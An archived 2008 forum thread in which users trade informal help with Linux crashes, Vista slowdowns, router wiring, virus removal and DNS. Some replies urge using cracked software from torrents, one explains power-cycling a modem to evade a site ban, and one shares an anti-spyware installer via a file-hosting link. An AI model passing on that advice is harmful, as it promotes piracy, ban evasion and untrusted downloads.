PDA

View Full Version : Official Computer Problems Thread

Pages : 1 2 3 [4] 5 6

GreenTerror
09-24-2008, 08:12 PM
I've been complaining to anyone and everyone about this problem, and I have no idea wtf to do.
I'm running Ubuntu Hardy Heron. I've tried the Ubuntu support forums but there have been no replies to my thread at all. I know at least a few of you have good experience with the Linux OS, so help me plz :(

Copypasta'd my post from there:

I am enrolled in an online high school and one of my current classes uses Java in every daily quiz. I've never experienced any problems with this up until the past couple of weeks, and even then, it was never as bad as it was tonight (4 times within approx. half an hour).
I'd enter a quiz, answer a couple of questions, and scroll down a bit to see the next ones, and my screen suddenly goes black, and then I see the white text that appears when you first start up Ubuntu, and it takes me to the login screen like I'd just restarted it. This happened during an exam last week and I ended up having to retake it. That wasn't so bothersome, but I do, however, have a final exam to take sometime this week and I really can't have this happen during that.

Now, the only time this EVER happens is when I'm taking a quiz that has many Java applets, and I've noticed that scrolling up or down tends to trigger it.

Am I the only one who has had this problem? This seems to be a (very annoying and frustrating) bug, but is there any fix for it? Disabling or uninstalling Java isn't an option, literally every question in my quizzes and exams are in Java for some reason.

I really appreciate any help at all.

Endymion
09-24-2008, 08:52 PM
any idea if ubuntu uses sun's java or gcj?

sounds like it triggers a kernel panic of some sort.

GreenTerror
09-24-2008, 09:23 PM
What's GCJ?

Endymion
09-24-2008, 09:34 PM
the gnu compiler for java. it's an alternate implementation of the java language.

Jakebert
09-24-2008, 09:51 PM
So I was trying to burn a CD and it fucked up, now the disc is stuck in my disc drive and it won't open. WHAT DO I DO??

GreenTerror
09-24-2008, 09:54 PM
Oooh. I don't think that's what I have, then. I installed Sun's JRE, I believe. I didn't get it through the Java site, though. I just installed it straight from Synaptic. Nothing seemed to go right when I'd try to download and install the .tar from Java.

Jebus
09-24-2008, 10:36 PM
So I was trying to burn a CD and it fucked up, now the disc is stuck in my disc drive and it won't open. WHAT DO I DO??
If you look closely, there should be a pin sized hole on the drive. Grab a paper clip and stick it in.

Endymion
09-25-2008, 01:13 AM
Oooh. I don't think that's what I have, then. I installed Sun's JRE, I believe. I didn't get it through the Java site, though. I just installed it straight from Synaptic. Nothing seemed to go right when I'd try to download and install the .tar from Java.

can you show me the output of "java -version"?

the_real_potomek
09-25-2008, 01:25 AM
my computer is really stupid, it suspends all the time and doesn't want to work with other implements. I'm not technic-smart enough to fix it so I'm andry with it all the time.

GreenTerror
09-25-2008, 02:50 AM
can you show me the output of "java -version"?

shelby@FluffyGonzales:~$ java -version
java version "1.6.0_06"
Java(TM) SE Runtime Environment (build 1.6.0_06-b02)
Java HotSpot(TM) Client VM (build 10.0-b22, mixed mode, sharing)

I'm not technic-smart enough to fix it so I'm andry with it all the time.

We all get andry with our computers once in a while.

the_real_potomek
09-25-2008, 03:49 AM
sorry, I mean to write 'angry':)

GreenTerror
09-25-2008, 07:00 PM
I tried using Opera for a bit instead of Firefox, and at first I thought it worked, but it didn't. It's just not as often as it was in Firefox, but it still happens.

Endymion
09-25-2008, 08:18 PM
do you have compiz enabled? the wobbly windows et al? if so, try disabling it.

if you still get crashes, try enabling the testing repository and updating to a newer version of java.

GreenTerror
09-25-2008, 09:17 PM
Yes, I have Compiz enabled, just for window decorations. My computer can't handle anything too fancy. I'll give that a try.

GreenTerror
09-26-2008, 12:39 AM
Well, I disabled Compiz, and it worked... Until I was about 2/3 done with my exam, then my computer restarted itself again. But it kept from doing it a lot longer than it did when I had Compiz enabled.

Endymion
09-26-2008, 12:59 AM
can you tell me more about the restarting? does it actually completely restart, or does it just go back to the login screen?

GreenTerror
09-26-2008, 01:14 AM
It completely restarts. The white text before the login screen that says whatever is going on before the login screen comes up, like as if I were booting up my computer from it being off.

Endymion
09-26-2008, 01:26 AM
so full on reboot, takes a minute to get to the login screen, etc? you see the bios show up real fast at the beginning, etc?

GreenTerror
09-26-2008, 01:35 AM
Yes, exactly.

Free?
10-01-2008, 12:02 PM
So, I'm studying Sony Vegas 8.0 now, I have 2 problems with that.

- I can't find/configure any good codec to compress raw fraps-captured video without any noticeable loss in quality. Mostly I use latest DivX(6.8.4) and Xvid (1.1.3). The uncompressed video files look great, but they are ways too fat (30sec ~600+MB, 1280x1024). I've found some pretty good codec configs but I just can't get rid of noticeable horizontal lines and they all seem to be pretty blurry. Also I have to compress in a lower resolution (1024x768 which is acceptable) but still I would prefer to keep the original 1280x1024 resolution. In one sentence - I'd like to get as better as possible results.

-The version of Sony Vegas 8.0 Pro (which I've downloaded from torrent :rolleyes:) doesn't have any plugins, even most basic like noise/hue-saturation etc. I've found some advanced plugins, but I need basic ones the most. Could someone please upload (or link) them for me with instructions how to install them (if there is anything special).

I would appreciate if someone could help me with that!

EDIT: I solved both problems, thanks for your attention :p.

sKratch
10-03-2008, 03:19 PM
Does usenet benefit from setting up QoS or does it automatically get maximum bandwidth priority? If it does benefit from QoS, what protocols does it use (TCP, UDP, etc)?

HornyPope
10-03-2008, 11:56 PM
Does usenet benefit from setting up QoS or does it automatically get maximum bandwidth priority? If it does benefit from QoS, what protocols does it use (TCP, UDP, etc)?

What do you think this is the unix forums?

0r4ng3
10-20-2008, 09:00 PM
Okay, so I've been trying to get this English Translation Patch for Mother 3 to work, but it doesn't. I have the ROM, I have the patch, but whenever I try to open the patch, absolutely nothing happens. So...help?

Homer
10-21-2008, 04:15 PM
1. Download the ROM.
2. Unzip the ROM.
3. Download the patch.
4. Unzip the patch.
5. Locate the Mother.gba file.
6. Patch that motherfucker!

0r4ng3
10-21-2008, 04:54 PM
See, that's the problem. It should be that simple. But I feel like there should be a step 5.5, because I have the ROM, I have the patch (the icon that looks like Lucas, right?), but when I click the patch, nothing happens.

Homer
10-21-2008, 05:22 PM
Try re-downloading the patch/restarting your computer/placing the patch on a different drive (if possible).

What operating system are you using?

0r4ng3
10-21-2008, 07:54 PM
I tried the re-downloading/restarting thing several times.

I have a Mac OS X-something or other. It's not Leopard.

WebDudette
11-02-2008, 07:07 PM
Can I resize multiple images at once with Photoshop CS2?

Jebus
11-02-2008, 08:36 PM
I need a free dvd burning software that is capable of creating dvd images for windows. Any suggestions?

Bipolar Bear
11-02-2008, 11:26 PM
why don't you get one that isn't free
get like a cracked one from a torrent
that's what I'd do

Free?
11-03-2008, 05:28 AM
I need a free dvd burning software that is capable of creating dvd images for windows. Any suggestions?
I think this should work. But I haven't tested that version of nero.
http://www.youtube.com/watch?v=sSFGvWQgtgY

m.offspring.r
11-03-2008, 06:39 AM
I think this should work. But I haven't tested that version of nero.
http://www.youtube.com/watch?v=sSFGvWQgtgY

Try DeepBurner.

Tijs
11-03-2008, 07:49 AM
Can I resize multiple images at once with Photoshop CS2?
I posted a method in this thread:
http://www.offspring.com/forums/showthread.php?t=35177

0r4ng3
11-03-2008, 08:27 PM
Lately my printer's been printing only the first page of things, and I have no idea why. I haven't changed any settings, so I haven't fucked it up, as far as I know.

SK8rocka
11-03-2008, 11:16 PM
ok hoes?

this is wierd, my left channel on my soundcard is fucked, i can't record because of the noise, all i did was try to put convert tapes to cd

0r4ng3
11-05-2008, 03:05 PM
I downloaded a torrent for the new Futurama DVD, but when I open it in Quicktime (or anything, for that matter) there's no sound. I don't think the file is bad, because I've read the comments on the torrent page, and no one else seems to have a problem with it. So what's wrong with my computer this time?

ALICIA21
11-05-2008, 03:16 PM
a) the drive broke
b) the drive's connection to the rest of the computer is loose
c) the power to the drive is loose.

It's helped me before.

Try opening the computer and disconnecting/reconnecting it.

Lizardus
11-05-2008, 10:46 PM
I downloaded a torrent for the new Futurama DVD, but when I open it in Quicktime (or anything, for that matter) there's no sound. I don't think the file is bad, because I've read the comments on the torrent page, and no one else seems to have a problem with it. So what's wrong with my computer this time?

You have Quicktime.

Try VLC.

0r4ng3
11-05-2008, 10:47 PM
Actually, I just downloaded a different torrent, and it works fine. Thanks anyway for the advice, I'll try it next time something else fucks up, which it probably will.

randman21
11-08-2008, 07:31 PM
This is a problem I've never encountered before (Windows Vista).

There's a weird thing that just started yesterday, whenever I access a certain folder that contains my music files (not mp3s, but drum, guitar, etc files for my songs). If I open the folder itself, I notice that on Windows Task Manager>Processes, explorer.exe uses up to 700,000 K Memory (Private Working Set) and 90-something percent Physical Memory. When I try to open anything from this folder via VLC, it's the same except vlc.exe is the problem; the same with Guitar Rig, Adobe Audition, etc. Even when I close the offending program, my computer doesn't become "unstuck" for about 10 minutes.

It's a pretty pretty big folder, but I have a few that are probably bigger, and this one is only a subfolder. Any suggestions?

The Talking Pie
11-09-2008, 06:11 AM
Vista attempts to 'thumbnail' just about everything. It could be that (seeing no thumbnails, scanning them all to see if it can generate any and not being able to do so, so the same thing will happen again next time).

randman21
11-09-2008, 06:50 PM
Thanks, Pie. What should I do about it?

Free?
11-10-2008, 08:15 AM
I had a friend helping me with some windows repair, he did well except the new problem was born. I have 3 HDDs, their letters have been changed (the G:\ became F:\ for example). I need to rename them back, but the problem is that "Disk Management" doesn't work for me. I get an error. I'm googling for the solution, but I haven't found a working one yet.
http://i478.photobucket.com/albums/rr149/therunawayfromdangerman/RPC.jpg?t=1226329362
http://i478.photobucket.com/albums/rr149/therunawayfromdangerman/Logdismanserv.jpg?t=1226330031

I use windows xp sp3.
Maybe somebody knows how to get it working?

Endymion
11-10-2008, 12:40 PM
RPC stands for remote procedure call. also, googling once in a while tends to help: http://support.microsoft.com/kb/884564

The Talking Pie
11-10-2008, 04:56 PM

Not too much you can do, I would imagine. Short of turning off caching/thumbnailing/whatever-the-Hell-else-Windows-does-in-the-background. But then Vista wouldn't look as swish, which is half the appeal. You'd notice a difference in performance, though.

However, it could be something else altogether.

What happens when you do the same in Safe Mode?

Lizardus
11-10-2008, 06:01 PM

You could try changing the icon size.

randman21
11-10-2008, 06:52 PM
Sorry if I sound incredibly dumb here, but I have all my folders set on details. Also, the same thing happened with the "Recylcing Bin" which was also pretty large and when I emptied it, of course, we were back to normal. I'm going to try the Safe Mode thing.

EDIT: Holy wow. It still does it in Safe Mode, but it recovered in less than a minute.

Cock Joke
11-10-2008, 07:46 PM
Anybody know why my browser likes to go "Bye-bye" whenever I go on Youtube?

Tijs
11-11-2008, 02:40 AM
What browser do you use?

Cock Joke
11-11-2008, 09:26 AM
What browser do you use?

Firefox, the most recent version.

It might also be important that I say I use Windows Vista.

Tijs
11-11-2008, 09:32 AM
Hm, well my Firefox has been crashing constantly lately, too. Do you use any addons? Try turning off some and see what happens.

randman21
11-11-2008, 09:41 AM
Just adding
that I use the latest Firefox, Vista, and a lot of addons and I haven't crashed.

Jojan
11-11-2008, 10:34 AM
Vista

That's your problem.

The Talking Pie
11-11-2008, 11:03 AM
Sorry if I sound incredibly dumb here, but I have all my folders set on details. Also, the same thing happened with the "Recylcing Bin" which was also pretty large and when I emptied it, of course, we were back to normal. I'm going to try the Safe Mode thing.

EDIT: Holy wow. It still does it in Safe Mode, but it recovered in less than a minute.

Right... that's got me stuck. It's obviously not thumbnailing, so it could perhaps be other file operations (tallying up sizes, etc.? I don't know...). If there's not a fix in the Microsoft Knowledge Base, I'd just suggest splitting the directories up. Large files/folders do work under Windows, but not always elegantly.

GreenTerror
11-11-2008, 04:01 PM
Firefox, the most recent version.

It might also be important that I say I use Windows Vista.

Firefox crashes 2/3 of the time when I Youtube, and I also have the latest version of it. It's a bug that they haven't fixed yet, as far as I know. Though I thought this problem only existed on Ubuntu, guess not.

I use Opera whenever I need to go on Youtube. It's a pain switching between two browsers, but it's far less frustrating than Firefox crashing every two seconds.

Cock Joke
11-11-2008, 04:34 PM
Thanks everyone! I guess I should just use another browser on that site 'til something sorts out.

Tijs
11-11-2008, 05:26 PM
VistaThat's your problem.

He said his didn't crash, despite of him using Vista.
Just adding
that I use the latest Firefox, Vista, and a lot of addons and I haven't crashed.

Thanks for clearing it up, GreenTerror. I've actually been wondering myself why it didn't work. I'm using Chrome next to Firefox most of the time now.

randman21
11-11-2008, 06:23 PM
I guess I'm one of the lucky one with the Firefox/YouTube combo, but now I know what to do should the problem arise.

If there's not a fix in the Microsoft Knowledge Base, I'd just suggest splitting the directories up. Large files/folders do work under Windows, but not always elegantly.
Thanks a lot. If I can get into the folder long enough, I'll transfer some files out. Problem solved.

Endymion
11-11-2008, 07:23 PM
Thanks a lot. If I can get into the folder long enough, I'll transfer some files out. Problem solved.

or do it from the command line.

_Lost_
11-11-2008, 07:26 PM
i'll just add in here that firefox is quite possibly the most frustrating browser I've ever used. I really don't get why its so popular. There is occasionally something that won't work in safari which is the only reason i downloaded firefox in the first place, but firefox give me so many more problems.

Free?
11-12-2008, 05:06 AM
RPC stands for remote procedure call. also, googling once in a while tends to help: http://support.microsoft.com/kb/884564

Hehe, I googled that far. I set the RPC to automatic (that's why there was the second screenshot), started it and still had the problem. And I was on that microsoft page before, the workaround was the most simple solution that I've tried to do, even before I started to google.

And I use firefox, it works perfectly. I believe that loads of problems cause either Vista or Service Pack 3 for XP. I use Windows XP SP3.

deleterious
11-12-2008, 09:20 AM
My sound doesn't work (And no, I'm not stupid, I HAVE checked if I just accidentally turned it off but I haven't)

The thing is, my computer says that there is no sound device(?), but I haven't taken anything away. Everything worked perfectly fine until the sound suddenly didn't work a couple of months ago.
Any idea? :P

Tijs
11-12-2008, 09:34 AM
Control Panel -> Add Hardware -> See if it finds anything and install it if it does.

If not: Open your computer and take out the sound card, and put it back in. Preferable in a different slot if there is one.

deleterious
11-12-2008, 09:59 AM
Thanks! :)

Tyler Durden
11-16-2008, 03:55 PM
My little brother was underage b& from 4chan, so now no computer in the house can go on it. Is there anyway to get back on? Proxies don't seem to work, they're all blocked. But there must be a way.

Endymion
11-16-2008, 04:41 PM
your "little brother" should go on the 4chan irc channel and beg to have the ban reverted.

protip: you don't get banned for being underage.

bighead384
11-17-2008, 11:29 AM
Oh boy am I frustrated...

My Wireless G Linksys router is seriously malfunctioning. Two days ago, I moved my router and desktop PC to another room. Ever since then, I can't connect wirelessly anymore. To make things even worse, when I try to send the connection through the router, I can't even connect on my desktop, let alone connect wirelessly. I'm almost positive it's a software issue by this point, because I checked all my hardware and it all works fine. In fact, all the proper lights on the boxes are lit, I just can't connect for some reason. Anyone have a solution?

Endymion
11-17-2008, 12:00 PM
if you're connected via a wire to the router, does it work (you didn't specify how your desktop connects to the router)? if not, can you at least connect to the router (generally 192.168.1.1)?

Jebus
11-17-2008, 12:04 PM
My little brother was underage b& from 4chan, so now no computer in the house can go on it. Is there anyway to get back on? Proxies don't seem to work, they're all blocked. But there must be a way.
Assuming you have dsl and a dynamic IP (most people do), you can powercycle your modem by turning it off for 30 seconds and turning it on back again. You should have a new ip address. Not sure if it's the same for cable.

bighead384
11-17-2008, 12:10 PM
if you're connected via a wire to the router, does it work (you didn't specify how your desktop connects to the router)? if not, can you at least connect to the router (generally 192.168.1.1)?

My desktop connects to the router with an Ethernet cable. When I plug an Ethernet cable directly into the surfboard, I can get on the internet on my DESKTOP ONLY. However, when I go through the router, not only am I unable to connect wirelessly, but I can't even connect on the desktop anymore. Strangely enough, I'm able to get all the proper lights on, but it says my connection is "either too weak or isn't working at all" or something like that. I went to the support site for linksys and they told me to update my software, but I'm having trouble with that, like I said.

_Lost_
11-17-2008, 02:42 PM
sounds like your router has issues. when my family moved in the spring, we had to get a new router because the old one wasn't compatible anymore. All the lights on the box would be lit, but we couldn't get a connection.

Jebus
11-17-2008, 03:17 PM
when I try to send the connection through the router, I can't even connect on my desktop, let alone connect wirelessly.

when I go through the router, not only am I unable to connect wirelessly, but I can't even connect on the desktop anymore.
I'm having a difficult time understanding what you mean this.

bighead384
11-17-2008, 03:45 PM
I'm having a difficult time understanding what you mean this.

I'm able to connect to the internet on my desktop when I don't use the router. I'd also like to hook up my router so that the laptops in my apartment can access the internet. When I try to hook up the router so that I can achieve this, it does not work. Furthermore, the desktop connection doesn't work, if and only if the router is also hooked up.

I've been recommended a software upgrade from the people on the linksys forums. I can download it, but it's a BIN file (what the fuck is a BIN file?). I've never heard of a BIN file before, much less do I know how to open one.

nameless
11-17-2008, 03:54 PM
i have a problem every so often that the computer just wont load. it just shows the brand of the monitor with a message about changing the screen size but you cant do anything after that to load the computer to get to the settings to change anything. other times it just loads straight away!

Jebus
11-17-2008, 04:11 PM
First thing first. Lets make sure it's not just a simple mistake and you're just mixing up the ethernet cable connections. This is how you have it set up right?
http://img.photobucket.com/albums/v255/Savemejebus/routercorrect.jpg

If that's correct, can you access the router or modem firmware in your browser from your desktop PC ? It varies, but for me, http://192.168.1.1/ is for my router and http://192.168.0.1/ is for my modem.

On your laptop, can you at least find your router within the wireless networks list. Just for now, it doesn't have to say connected.
http://img.photobucket.com/albums/v255/Savemejebus/router.jpg

bighead384
11-17-2008, 08:15 PM

Damn. The wires were backwards. I wasted so much time. I don't even know what else to say except that. Thanks.

But of course, now I have another problem that I created by fucking around with shit so much in my frustration. My laptop is picking up SOME signal again, and my desktop can finally connect to the internet when the router is hooked up. However, I deleted the Linksys software program as I was trying to downloaded a newer version. Like I said earlier, I still can't figure out how to download the updated version, but I deleted the older version (which I was told to do at the Linksys forums). Can I pop in the Linksys disc again or will that create some sort of problem?

Edit: I forgot to mention that the problem all this is creating is that I'm not picking up the right signal on my laptop. I'm picking a weak signal called "linksys", but not the faster connection that I used to pick up. That's why I think I need to change the settingd with that software program.

Jebus
11-17-2008, 08:22 PM
I'm assuming you're talking about the drivers for your laptop's wireless adapter. If you uninstalled it, then just reinstall it using the cd. No problem.

bighead384
11-17-2008, 08:25 PM
I'm assuming you're talking about the drivers for your laptop's wireless adapter. If you uninstalled it, then just reinstall it using the cd. No problem.

There used to be a little green linksys icon on the taskbar. From there, I could change the settings. I deleted that thinking I needed to, but I hoping I can just reinsert the disc again.

Jebus
11-17-2008, 08:32 PM
Should be able to.

Tyler Durden
11-17-2008, 08:45 PM
Stupid question but is it bad to leave a disc in the drive when you're not using it? I read somewhere it could collect dust, and the game has been in there for a couple months now. I just started it back up today and it feels laggy...Or is it just my imagination.

Thomas
11-17-2008, 09:57 PM
So the technical support for Steam suuuuuuuuuuuuuuuucks (I sent them an e-mail months ago, they never responded) so I'm getting frustrated and I miss Team Fortress 2 way too damn much so I'm gonna see if any of you guys can help me.

Whenever I try starting up Team Fortress 2, the "Preparing to Launch Team Fortress 2" screen comes on as it is supposed to, but once it closes, a second window appears that tells me to wait while steam "verifies game files". The loading bar fills up within a few seconds and then the window closes, but nothing happens after that. What ever shall I do?

bighead384
11-17-2008, 11:48 PM
Should be able to.

Yea, it worked. Thanks for the help. It made my night.

The Talking Pie
11-18-2008, 03:38 AM
Stupid question but is it bad to leave a disc in the drive when you're not using it? I read somewhere it could collect dust, and the game has been in there for a couple months now. I just started it back up today and it feels laggy...Or is it just my imagination.

As long as you have the proper materials to clean the disc (i.e. not straight-up liquids or cloth that's in any way abrasive, etc.), then it won't matter. Think of it this way; the laser in your CD/DVD drive will be collecting dust too, and I'm sure that you don't remove that when you're not using it. However, dust on the lens could also be the problem for bad reading if it is going slow. I always advise people to shove a vacuum cleaner inside the drive.

Kennytar
11-19-2008, 06:16 AM
I wanna complain too! yay!
I truly hate comps. I mean they keep disfunctioning around me. Probably its my fault. My own comp crashed - some part of the comp burned out or smth. Well its fixed now but my bro is too lazy to but programmes on it...
So in the mean time i was using my bros comp. Yesterday morning I turned it on and it said "A disk problem occoured" (more or less). So, smarter ppl told me that it means harddrive not connected. Anyway..... I really need comp to do my school assigments and visit bbs etc lol. Now im waiting my bro to come back from school and give my my comp back....
Stupid technology!

Desperado
12-06-2008, 05:56 PM
i just downloaded project 64 and OOT. i got the game running just fine, but i'm having problems with save states. i download the savestate to my comp, but what do i do with it? how do i get it into the emulator?

nameless
12-07-2008, 04:00 PM

that may be the mistake ive made, the drive wont read the disk or do anything when i insert it! im always leaving discs in there though!

bighead384
12-09-2008, 03:32 PM
Ok, so I've got some sort of virus. I'm getting pop up adds out of nowhere, and for some reason, only about 2/3 of the pictures on any given Myspace page load up for me. It's strange. Does anyone know about this virus?

Also, some virus scan or anti-spyware program suggestions would be great.

Eh? ?

Thomas
12-09-2008, 09:13 PM
Okay, I managed to solve the TF2 problem by just re-installing the whole game.

However, I have a new problem. I bought Far Cry today. It's a 5-disk game. The first four disks worked perfectly fine but the 5th disk isn't even reading. The disk looks to be in near perfect condition. What should I do? Should I let my computer cool off for a while and try again? It does seem awfully warm...

EDIT: I have a lap-top, btw.

Lizardus
12-09-2008, 11:04 PM
Okay, I managed to solve the TF2 problem by just re-installing the whole game.

However, I have a new problem. I bought Far Cry today. It's a 5-disk game. The first four disks worked perfectly fine but the 5th disk isn't even reading. The disk looks to be in near perfect condition. What should I do? Should I let my computer cool off for a while and try again? It does seem awfully warm...

EDIT: I have a lap-top, btw.

Try looking for a torrent and download the fifth.
there is a small number of other things you can do, but i'm kind of tired right now.

bighead384
12-10-2008, 09:56 AM
Ok, so I've got some sort of virus. I'm getting pop up adds out of nowhere, and for some reason, only about 2/3 of the pictures on any given Myspace page load up for me. It's strange. Does anyone know about this virus?

Also, some virus scan or anti-spyware program suggestions would be great

A free anti-virus program is mostly what I seek.

Free?
12-10-2008, 10:41 AM
From millions of free trojan-removers Spyware Doctor (http://www.pctools.com/spyware-doctor/) seems to be better than the rest, from my personal experience, I'm not professional though.

bighead384
12-10-2008, 03:59 PM
From millions of free trojan-removers Spyware Doctor (http://www.pctools.com/spyware-doctor/) seems to be better than the rest, from my personal experience, I'm not professional though.

Damnit. I downloaded it and ran the scan but it's not free, Free?. I need a free one. It found all these viruses too.

Endymion
12-11-2008, 01:11 AM
A free anti-virus program is mostly what I seek.

AVG. google it.

Free?
12-11-2008, 11:12 AM
Damnit. I downloaded it and ran the scan but it's not free, Free?. I need a free one. It found all these viruses too.

It is a free version you downloaded, the pro-upgrade isn't free, but I use the free version, it works fine for me, though some of functions aren't available.

bighead384
12-11-2008, 11:56 AM
It is a free version you downloaded, the pro-upgrade isn't free, but I use the free version, it works fine for me, though some of functions aren't available.

It does the scan and finds viruses but it won't let me use the function that actually cures the virus. It's so lame.

bighead384
12-11-2008, 11:57 AM
AVG. google it.

I gave that and it's not working. I don't think it's finding all the viruses, and when I does, I try to heal the virus but it says it can't find the file specified.

Free?
12-11-2008, 01:20 PM
I've checked my spyware doctor. It's a starter version, but it works and removes infections.
Here is the setup. http://www.sendspace.com/file/0vsksp It should work. I hope it will help.

Jojan
12-11-2008, 06:34 PM
To clean my partens Windows computers from Spyware (except for Windows itself) I use Adaware.

bighead384
12-11-2008, 07:10 PM
I've checked my spyware doctor. It's a starter version, but it works and removes infections.
Here is the setup. http://www.sendspace.com/file/0vsksp It should work. I hope it will help.

I downloaded that, and now my computer is crashing and I can't even get it to stay on for 2 minutes without rebooting. Any idea why?

The only thing I can think of is that I have AVG as well as Spyware Doctor. COuld that have anything to do with it?

bighead384
12-11-2008, 09:17 PM
Yup. Computer is still COMPLETELY fucked up. I can hardly get windows to load, and when it does, it's reboots out of nowhere after like 5 minutes. I couldn't get it to go in safe mode, but maybe if I'm lucky enough, it'll load in safe mode and I can try to fix the problem.

But what I don't fucking understand is why I have this problem now.

Endymion
12-11-2008, 11:18 PM
in this modern age, once you have a real virus on your computer the only way to be sure you're clean is to wipe the drive and start from a known-clean image.

or, you know, use a real operating system.

Budzy
12-11-2008, 11:57 PM
My Keyboard doesn't work.

Free?
12-12-2008, 03:42 AM
Yup. Computer is still COMPLETELY fucked up. I can hardly get windows to load, and when it does, it's reboots out of nowhere after like 5 minutes. I couldn't get it to go in safe mode, but maybe if I'm lucky enough, it'll load in safe mode and I can try to fix the problem.

But what I don't fucking understand is why I have this problem now.
I haven't tried AVG so I don't know how it could work together with Spyware Doctor, but SD didn't have any conflicts with any anti-virus program that I ever had on my pc. So you can't even complete full scan with crashes like that... :( I feel sorry for you man, I know how it feels to have something like that. I would try to re-install windows first (it really should help), if the problem is still there, the only way remains is wiping your hard drive and re-installing windows again.

in this modern age, once you have a real virus on your computer the only way to be sure you're clean is to wipe the drive and start from a known-clean image.

or, you know, use a real operating system.

I had a really frustrating problem 2 weeks before, I couldn't connect to Internet, however some programs like Skype were working fine and some torrents were able to find seeds and download. One of the worst parts about that was that I couldn't google for any solutions and update anti-virus programs, I used my friend on skype. So I've tried different ways to solve the problem (like few trojan-removers like Spyware Doctor, my anti-virus back then was avast! and all it could do is to say that he fail to update itself, nothing about virus, it even didn't work in Safe Mode, even after system restore to the point where everything should work, but no, it didn't help as well, reinstalled the "real" windows, no internet, "format c" then re-install windows again, even that didn't help, so I ended up scanning for trojans/errors with Spyware Doctor and Kaspersky antivirus, still they found few things to fix, I've done it, but it didn't help either), in the end I really was out of ideas how after all of this I still had the same fucking problem. Then, one day it just suddenly started to work, Internet appeared and I have no fucking clue how it did happen. Maybe it was my Internet provider who just said that I have the traffic and the problem was within my PC, not his fault and later he just "rebooted" his server or something like that and didn't let me know, but I guess I'll never know for sure.
The point is that sometimes even full-wipe doesn't help.

bighead384
12-12-2008, 10:45 AM
My computer keeps telling me to run scan disk. Where can I find that?

Free?
12-12-2008, 10:57 AM
If you press F1 while being on your desktop, it will open the Help. You can find anything you want there about windows.

Detecting and repairing disk errorsYou can use the Error-checking tool to check for file system errors and bad sectors on your hard disk.

Open My Computer, and then select the local disk you want to check.
On the File menu, click Properties.
On the Tools tab, under Error-checking, click Check Now.
Under Check disk options, select the Scan for and attempt recovery of bad sectors check box.
Notes

To open My Computer, double-click the My Computer icon on the desktop.
All files must be closed for this process to run. If the volume is currently in use, a message box will appear prompting you to indicate whether or not you want to reschedule the disk checking for the next time you restart your system. Then, the next time you restart your system, disk checking will run. Your volume will not be available to perform other tasks while this process is running.
If your volume is formatted as NTFS, Windows automatically logs all file transactions, replaces bad clusters, and stores copies of key information for all files on the NTFS volume.
For more information, click Related Topics.
Basically go to My Computer, select a hard disk you need, go to it's "properties", in the Tools tab there is "Error Checking" function, Check Now will start that scan.

bighead384
12-12-2008, 11:05 AM
Okay. I figured that out. Now I just need my computer to stay on for more than 1 minutes so I can get to that disk and scan it. Because sometimes it let's me stay on for a little while.

I just don't understand why it is that the first time I ran spyware doctor, it told me it needs to reboot to fix an error, but then my computer crashes.

Endymion
12-12-2008, 11:32 AM
I had a really frustrating problem 2 weeks before, I couldn't connect to Internet, however some programs like Skype were working fine and some torrents were able to find seeds and download. One of the worst parts about that was that I couldn't google for any solutions and update anti-virus programs, I used my friend on skype. So I've tried different ways to solve the problem (like few trojan-removers like Spyware Doctor, my anti-virus back then was avast! and all it could do is to say that he fail to update itself, nothing about virus, it even didn't work in Safe Mode, even after system restore to the point where everything should work, but no, it didn't help as well, reinstalled the "real" windows, no internet, "format c" then re-install windows again, even that didn't help, so I ended up scanning for trojans/errors with Spyware Doctor and Kaspersky antivirus, still they found few things to fix, I've done it, but it didn't help either), in the end I really was out of ideas how after all of this I still had the same fucking problem. Then, one day it just suddenly started to work, Internet appeared and I have no fucking clue how it did happen. Maybe it was my Internet provider who just said that I have the traffic and the problem was within my PC, not his fault and later he just "rebooted" his server or something like that and didn't let me know, but I guess I'll never know for sure.
The point is that sometimes even full-wipe doesn't help.

a full wipe wouldn't work when the problem wasn't a virus on your computer. sounds like your dns server had failed and you reformatted for no reason. and when you reformatted you lost all your security updates which left you vulnerable to auto-exploit bugs which is why you found viruses after being unprotected on the web even for a short time.

Free?
12-12-2008, 11:55 AM
a full wipe wouldn't work when the problem wasn't a virus on your computer. sounds like your dns server had failed and you reformatted for no reason. and when you reformatted you lost all your security updates which left you vulnerable to auto-exploit bugs which is why you found viruses after being unprotected on the web even for a short time.

Yeah, my internet provider also mentioned DNS server, his version was that there is a virus on my pc which somehow modifies DNS settings so I had such results as some programs worked online, but I couldn't connect to Internet.
And I still couldnt connect to Internet after formatting/re-installing windows, all I did back then was scanning scanning and scanning. I couldn't get more viruses because I couldn't go anywhere. So once the miracle happened I stepped into web with kaspersky and spyware doctor alarming me few times on each suspicion.

Endymion
12-12-2008, 12:07 PM
an unpatched windows box has many vulnerabilities that can be exploited without you doing anything other than being connected.

also, DNS is the service that turns URLs like www.google.com into IP addresses like 208.67.219.231 . if things like skype have IP addresses hard coded, then there is no need for them to use DNS and they'd be able to connect fine. however when you browse on the web you don't type in IP addresses, so it would seem like the 'net wasn't working even though only a small part of it was broken. or your router could have just had a bad DNS ip in it and resetting that would have fixed it.

bighead384
12-12-2008, 12:48 PM
I somehow was able to log on without being booted off in like 30 seconds. I got most of my important files off the computer luckily, but I hope I can figure out what the hell happened. I think I'm just going to fork out the cash for an expensive anti spyware program.

nieh
12-12-2008, 01:09 PM
One of these days Endy is going to post in this thread asking a question instead of answering one and the internet is going to implode in on itself.

Endymion
12-12-2008, 04:01 PM
it's like having super powers

Free?
12-12-2008, 04:49 PM
an unpatched windows box has many vulnerabilities that can be exploited without you doing anything other than being connected.

also, DNS is the service that turns URLs like www.google.com into IP addresses like 208.67.219.231 . if things like skype have IP addresses hard coded, then there is no need for them to use DNS and they'd be able to connect fine. however when you browse on the web you don't type in IP addresses, so it would seem like the 'net wasn't working even though only a small part of it was broken. or your router could have just had a bad DNS ip in it and resetting that would have fixed it.

Well, I did experimented a bit, i pinged a website and website's ip. Ip has pinged successfully, website's ping timed out back then. And the router is kinda rebellious against my computer I usually reset it once in 2 days, but back then I reseted it countless times, which was actually the first thing I've tried to do to fix the internet connection.
It was a nice explanation of how DNS works btw :).

bighead384
12-12-2008, 05:20 PM
What's a good site to go to for computer help if no one is online here?

Free?
12-12-2008, 05:27 PM
I usually google the error message or try to put my problem into a phrase which I google.

the_offsprings_monkey
12-14-2008, 01:40 AM
Your best bet you be to go on the filehippo website an down load a program called A2squared or something. It's fucking awesome and picks up alotta shit!

Vera
12-14-2008, 06:02 AM
